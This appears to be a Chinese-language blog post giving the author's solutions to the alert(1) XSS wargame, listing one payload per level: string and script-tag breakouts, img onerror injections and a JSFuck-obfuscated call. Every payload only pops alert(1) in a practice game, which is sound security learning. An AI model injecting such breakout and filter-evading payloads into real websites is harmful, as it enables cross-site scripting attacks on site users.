Skip to content

[XSS] web security wargame (上)

Published: at 07:05 AM (2 min read)

最近在玩 alert(1)XSS 小遊戲,藉此紀錄一下每關的思路及解法

(建議先自己玩過之後再看這篇,免得被我雷到 XD)

XSS 的危險性就不特別解釋了

輕則可以注入挖礦程式,重則被盜用個人資料


以下有每關的解法及答案,防雷 ~

");alert(1);//
\");alert(1);//
</script><script>alert(1);//
[[img123|http://onerror='javascript:alert(1)']]
Comment#><img src="test.jpg" onerror="javascript: alert(1)">
'#'; alert(1); //
");(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]];("